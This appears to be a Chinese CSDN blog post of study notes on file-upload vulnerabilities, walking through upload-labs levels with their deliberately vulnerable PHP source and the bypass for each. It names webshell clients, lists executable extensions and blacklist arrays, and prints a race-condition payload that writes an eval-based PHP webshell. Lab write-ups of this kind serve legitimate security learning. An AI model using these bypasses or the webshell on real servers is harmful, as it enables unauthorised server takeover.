WEB系列(四)_uploadfile笔记

已于 2023-02-19 17:18:54 修改
阅读量594 收藏
点赞数
分类专栏: WEB 文章标签: 安全
于 2022-05-01 08:27:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41748164/article/details/106689804
版权

文件上传

文章目录

原理

在有上传功能的系统中,如果应用程序没有对用户上传的文件做严格的校验,那么可能会导致用户上传脚本文件,然后用户再通过访问这些文件的方式,来达到执行该脚本文件,从而控制服务器的目的。
两个必要条件:
1. 文件能够上传并能够访问到
2. 文件具有可执行的权限

常用的webshell连接工具

  1. 中国菜刀(据说被设有后门,使用需谨慎)
  2. 蚁剑,开源能够在github上找到
  3. 冰蝎,开源能够在github上找到
  4. 哥斯拉,开源能够在github上找到

文件上传危害

  1. 获取网站权限,文件上传的主要功能。需要上传webshell,如何免杀也是值得深思的问题
  2. 上传 HTML 等文件,被恶意 SEO 、广告利用;
  3. 利用文件处理机制进行 DoS 攻击;
  4. 可被用于钓鱼、诈骗;
  5. 可被用于存储木马等恶意攻击文件;
  6. 可与文件包含等其他漏洞结合提高危害。

文件上传的位置

  • ⽤户头像
  • 上传附件
  • 上传配置⽂件
  • 上传数据库/⽹站备份⽂件
  • 上传主题等

文件上传的思路

在这里插入图片描述

下面结合upload-labs,具体分析

绕过JS

源码

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

分析

前端检查后缀名只允许上传 jpg、png、gif三种文件格式,由于检查代码在客户端所以可以绕过

绕过

  1. burpsuite 抓包,绕过JS
    在这里插入图片描述

  2. 浏览器删除JS,需要将原来的网页下载下来,删除相关调用,更改提交地址。

  3. 重写form表单直接提交

绕过MIME-Type

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

分析

从源码中我们可以看出,后端会从我们请求包中提取Content-Type: xxxxx字段检测上传文件的类型是否为 image/jpeg、image/png、image/gif,如果是,则允许上传。

绕过

Burpsuit抓包,更改Content-Type为image/png

在这里插入图片描述

绕过黑名单

思想:绕过黑名单可以通过寻找某些可以被作为脚本执行同时也不再黑名单中。

  1. 黑名单过滤不全

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
   if (file_exists(UPLOAD_PATH)) {
       $deny_ext = array('.asp','.aspx','.php','.jsp');
       $file_name = trim($_FILES['upload_file']['name']);
       $file_name = deldot($file_name);//删除文件名末尾的点
       $file_ext = strrchr($file_name, '.');
       $file_ext = strtolower($file_ext); //转换为小写
       $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
       $file_ext = trim($file_ext); //收尾去空

       if(!in_array($file_ext, $deny_ext)) {
           $temp_file = $_FILES['upload_file']['tmp_name'];
           $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
           if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
           } else {
               $msg = '上传出错!';
           }
       } else {
           $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
       }
   } else {
       $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
   }
}

分析

可以看到只检测了.asp,.aspx,.php,.jsp 以及大小写,文件末尾.绕过,windows ::DATA后缀绕过,但是在php环境下不只有php一种文件类型可以被解析执行

绕过

常见的可以被解析的文件名后缀

".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf" 以及各种大小写

==但是在pass-3中虽然可以绕过成功上传,但是文件并不会被解析。==虽然可以上传.htaccess但是会被重命名,只能改相应的配置文件才能被解析

  1. 上传配置文件

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

分析

从源码中我们不难看出禁止的文件名有很多,但唯独没有禁止.htaccess文件,也就是说我们可以上传一个.htaccess文件将任意后缀名解析成php文件执行。
在这里插入图片描述在上传一个.mp4文件,便可以回连(但是我在win11下复现失败了

  1. 后缀名删除不严

源码1

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
   if (file_exists(UPLOAD_PATH)) {
       $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
       $file_name = trim($_FILES['upload_file']['name']);
       $file_name = deldot($file_name);//删除文件名末尾的点
       $file_ext = strrchr($file_name, '.');
       $file_ext = strtolower($file_ext); //转换为小写
       $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
       $file_ext = trim($file_ext); //首尾去空
       
       if (!in_array($file_ext, $deny_ext)) {
           $temp_file = $_FILES['upload_file']['tmp_name'];
           $img_path = UPLOAD_PATH.'/'.$file_name;
           if (move_uploaded_file($temp_file, $img_path)) {
               $is_upload = true;
           } else {
               $msg = '上传出错!';
           }
       } else {
           $msg = '此文件类型不允许上传!';
       }
   } else {
       $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
   }
}

分析1

从代码中我们不难看出,由于在win下文件末尾的.会被去掉,所以可以利用. .来绕过
在这里插入图片描述### 源码2

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
   if (file_exists(UPLOAD_PATH)) {
       $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
       $file_name = trim($_FILES['upload_file']['name']);
       $file_name = deldot($file_name);//删除文件名末尾的点
       $file_ext = strrchr($file_name, '.');
       $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
       $file_ext = trim($file_ext); //首尾去空

       if (!in_array($file_ext, $deny_ext)) {
           $temp_file = $_FILES['upload_file']['tmp_name'];
           $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
           if (move_uploaded_file($temp_file, $img_path)) {
               $is_upload = true;
           } else {
               $msg = '上传出错!';
           }
       } else {
           $msg = '此文件类型不允许上传!';
       }
   } else {
       $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
   }
}

分析2

从源代码可知. .不再适用是因为文件名是时间+上传文件的后缀名命名的,如下图所示,
在这里插入图片描述
但是代码并未过滤大小写,所以下图可以绕过

在这里插入图片描述

源码3

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

分析3

从源码可以得知没有没有去掉空格所以上传后缀php .绕过

请添加图片描述

源码4

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
   if (file_exists(UPLOAD_PATH)) {
       $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
       $file_name = trim($_FILES['upload_file']['name']);
       $file_ext = strrchr($file_name, '.');
       $file_ext = strtolower($file_ext); //转换为小写
       $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
       $file_ext = trim($file_ext); //首尾去空
       
       if (!in_array($file_ext, $deny_ext)) {
           $temp_file = $_FILES['upload_file']['tmp_name'];
           $img_path = UPLOAD_PATH.'/'.$file_name;
           if (move_uploaded_file($temp_file, $img_path)) {
               $is_upload = true;
           } else {
               $msg = '上传出错!';
           }
       } else {
           $msg = '此文件类型不允许上传!';
       }
   } else {
       $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
   }

分析4

从代码中可以看到我们未对末尾的点进行过滤,所以上传 [空格].进行绕过
在这里插入图片描述

源码5

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
   if (file_exists(UPLOAD_PATH)) {
       $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
       $file_name = trim($_FILES['upload_file']['name']);
       $file_name = deldot($file_name);//删除文件名末尾的点
       $file_ext = strrchr($file_name, '.');
       $file_ext = strtolower($file_ext); //转换为小写
       $file_ext = trim($file_ext); //首尾去空
       
       if (!in_array($file_ext, $deny_ext)) {
           $temp_file = $_FILES['upload_file']['tmp_name'];
           $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
           if (move_uploaded_file($temp_file, $img_path)) {
               $is_upload = true;
           } else {
               $msg = '上传出错!';
           }
       } else {
           $msg = '此文件类型不允许上传!';
       }
   } else {
       $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
   }
}

分析5

经过对比,没有过::data后缀,所以绕过
在这里插入图片描述

源码6

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

分析6

查看源码分析到,因为是文件名直接由用户上传,只对后缀名做检查上传1.php. .,虽然后缀名被过滤成.,但不影响文件名的拼接所以可以绕过

在这里插入图片描述

源码7

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

分析7

从代码中我们可以看出只删除了一次已知后缀,于是可以双写绕过
在这里插入图片描述

源码8

练习题20

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

分析8

实际上通过源码我破门可以发现,这道题可以使用后缀名大小写绕过,还可以利用/.来绕过,原因是因为move_uploaded_file()有这么一个特性,会忽略掉文件末尾的 /.

白名单绕过

  1. %00 截断
    该方法需要php<5.3且关闭magic_quotes_gpc扩展。使用场景有限。
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

贴一张别人绕过的图
请添加图片描述

  1. 一句话木马
    该图片需要结合文件包含漏洞来解析图片的php代码

源码

在这里插入图片描述

在这里插入图片描述

  1. 二次渲染绕过
    一个基本思路是将他渲染过的图片与自己的图片进行比对找到为修改的进行替换,可以用python解决。稍后补上
  2. 竞争上传

源码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

分析

从代码看到先将图片上传上去,才开始进行判断后缀名、二次渲染。如果我们在上传上去的一瞬间访问这个文件,那他就不能对这个文件删除、二次渲染。这就相当于我们打开了一个文件,然后再去删除这个文件,就会提示这个文件在另一程序中打开无法删除。卡bug没成功过。

  • 简而言之,竞争上传是因为服务器在对图片木马处理前,就已经存在在服务器上,只有这样我们才能够绕过,获取shell。
    php代码如下,一直保持访问
<?PHP
fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[123])?>'); 
?>

burp 一直上传,就会发现原来上传的木马虽然被删了,但是它新生成shell.php。却被保存下来
在这里插入图片描述

  1. 截断绕过
    第21关
    20关是一个黑名单,php/.就可以绕过,但是21关他会检测文件后缀名,是一个白名单。所以把他拆分掉第三部分是.png,所以就会上传。实际上他上传上去的东西是
    upload-23.php/png 上传上去的东西就是upload-23.php。实现了绕过。
    在这里插入图片描述

参考链接

https://www.cnblogs.com/chu-jian/p/15515770.html
https://blog.csdn.net/qq_45584159/article/details/111239203#t21

weixinzjh
关注
专栏目录
Web前端工作笔记007---h5 canvas_雨滴头像合成_图像合成_合成雨滴头像
添柴程序猿的专栏
11-28 563
 JAVA技术交流QQ群:170933152    刚开始用java后台合成,但是java就是老技术,合成的图像不清晰,有一些锯齿,还是不如直接用h5 canvas清晰 就改用前端写了个雨滴头像合成工具   但是如果雨滴头像是显示在地图上的话,那么用前端合成,在web端是可以的,应该canvas需要用nginx类似的 web容器才能运行,而手机端apk包,就没办法用了,所以还不具有通用性...
web前端笔记:文件拖拽上传
AbuXiL的博客
07-01 626
html主要代码 $(‘div’).on({ dragenter: ()=>{}, dragover: ()=>{}, drop: ()=>{} }) // 设置被拖拽移动的内容可以放置在该标签上 event.originalEvent.dataTransfer.dropEffect = ‘move’ //获取到拖拽过来的资源 files = event.originalEvent.dataTransfer.files //设置图片路径 img.src = URL.createObject
UploadFile
03-17
上传文件
上传文件
ITRookiE1的博客
11-27 210
文章目录 文件上传和下载 准备工作 使用类介绍 代码编写 文件上传和下载 在Web应用中,文件上传和下载功能是非常常用的功能,这篇博客就来讲一下JavaWeb中的文件上传和下载功能的实现。 准备工作 对于文件上传,浏览器在上传的过程中是将文件以流的形式提交到服务器端的。 一般选择采用apache的开源工具common-fileupload这个文件上传组件。 common-fileupload是依赖于common-io这个包的,所以还需要下载这个包。 首先下载最新的jar包 https://m
uploadfile
12-13
解除文件大小限制的问题,对C#有兴趣的朋友可以加我,QQ:676984429
Web开发学习笔记20210428_RuoYi-fast上传图片
weixin_45308301的博客
04-28 696
实现过程 在上个练习记录帖的“测试管理”菜单中加入图片信息,使用了若依自带的com.ruoyi.project.common类中的uploadFile方法。实现过程: 在数据库sys_test表中添加条目test_pic记录图片的路径 在xml文件中加入映射 在实体类test.java中加入声明: /**测试图片*/ @Excel(name = "测试图片") private String testPic; public String getTestPic() { re
day70_淘淘商城项目_03_商品类目选择 + 图片上传 + 图片服务器FastDFS + 富文本编辑器KindEditor + 新增商品_匠心笔记
黑泽君
12-31 420
day70_淘淘商城项目_03_商品类目选择 + 图片上传 + 图片服务器FastDFS + 富文本编辑器KindEditor + 新增商品_匠心笔记
【学习笔记 - Spring Boot】04 - Spring Boot整合Web开发
AlanLee97的博客
11-18 359
【学习笔记 - Spring Boot】04 - Spring Boot整合Web开发 1. 返回json数据 2. 静态资源访问 3. 文件上传 4. 异常处理 5. 自定义错误页 6. 跨域资源共享 CORS支持 7. 注册拦截器 1. 返回json数据 Spring Boot的spring-boot-starter-web的依赖中已经默认加入了jackson-databind作为json处...
uploadFile
11-18
上传文件demo,android上传图片实例。
JAVA 使用uploadFile实现文件上传服务器
09-11
利用fileupload包进行文件的上传,可直接应用。项目里面已经含有了所需要的包
文件上传 —— 工具类 UploadFile
weixin_54966486的博客
05-10 1066
工具类 UploadFile package com.xsmjz.smartCampus.util; import org.apache.commons.io.filefilter.SuffixFileFilter; import org.springframework.web.multipart.MultipartFile; import java.io.File; import java.io.IOException; import java.util.HashMap; import java.u.
uploadfile上传图片
ysf871104的专栏
04-30 7961
配合ASP.NET 2.0提供了FileUpload控件,很容易就可以完成文件上传功能。做了一个简单的上传逻辑,实现了:检查了文件是否存在、自动生成文件名、自动建立上传文件夹、对文件类型作校验等功能。1using System; 2using System.Collections.Generic; 3using System.Text; 4using System.Web; 5us
uni.uploadFile上传文件
热门推荐
weixin_42551915的博客
11-24 1万+
uni.uploadFile上传文件问题
Uploadfile 控件上传文件的使用方法(js+jsp+后台)
qq_33458293的博客
12-14 2040
Jquery.Uploadify是JQuery的一个上传插件,实现的效果非常不错,支持多文件上传、带进度显示。不过官方提供的实例时php版本的,本文将详细介绍Uploadify在js中的使用,您也可以点击下面的链接进行演示或下载。官方下载:http://www.uploadify.com/download/ 官方文档:http://www.uploadify.com/documentation/
UploadFile上传图片-【控件简单应用】
weixin_30294021的博客
07-09 9391
protectedvoidButton1_Click(objectsender,EventArgse){if(FileUpload1.HasFile){stringfileContentType=FileUpload1.PostedFile.ContentType;...
fis3 upload file
robert198837的专栏
04-12 817
1.在project 目录下建个文件名为: fis.match('*', { deploy: fis.plugin('http-push', { receiver: 'http://host:port/receiver.php', to: '/path/to/project', }) }) 2. 将receiver.php 放到dev server proje
【uniapp小程序】uploadFile文件上传
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
08-21 2万+
上节中我们讲到小程序的request请求,掌握了基本的网络请求方式,这节我们通过小程序的uploadFile接口能力完成对小程序上传操作(uni.uploadFile,后端php接口),通过这一节你可以学习到php的上传接口的写法,以及如何配合前端完成一个小程序上传操作✨✨欢迎订阅本专栏或者关注我,大家一起努力每天一题算法题✨✨❤️❤️❤️ 最后,希望我的这篇文章能对你的有所帮助!愿自己还有你在未来的日子,保持学习,保持进步,保持热爱,奔赴山海!❤️❤️❤️。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值